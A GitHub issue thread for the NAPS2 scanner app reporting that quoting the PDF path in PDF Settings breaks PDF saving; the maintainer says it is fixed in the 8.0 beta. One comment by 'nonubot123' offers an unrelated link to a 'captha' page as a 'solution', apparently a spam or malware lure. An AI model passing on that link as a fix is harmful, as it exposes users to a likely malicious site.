cyanfish/naps2 #472: Putting quotes around PDF pathname breaks PDF functionality

Gitoffthelawn, 2024-10-16:
**Describe the bug**
If the user puts quotes around the pathname in the PDF Settings dialog box, and closes that dialog box, NAPS2 will no longer be able to Save as PDFs, nor will it be able to access that dialog box.

**To Reproduce**
Steps to reproduce the behavior:
1. Go to PDF Settings dialog box.
2. Put quotes around the pathname in the appropriate input field (sorry, can't see the name of the field at the moment because of this bug).
3. Click on the dropdown arrow adjacent to the Save PDF toolbar button.
4. Notice that none of the menuitems in that button will work.

**Expected behavior**
For NAPS to filter out the quotes if it doesn't want them. (I added them as a test to try to workaround another bug.)

**Desktop (please complete the following information):**
 - OS: Windows 11
 - Version: 7.5.2.0

nonubot123, 2024-10-24:
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

cyanfish, 2025-02-02:
This should be fixed in the 8.0 beta.

closed 2025-02-02 by cyanfish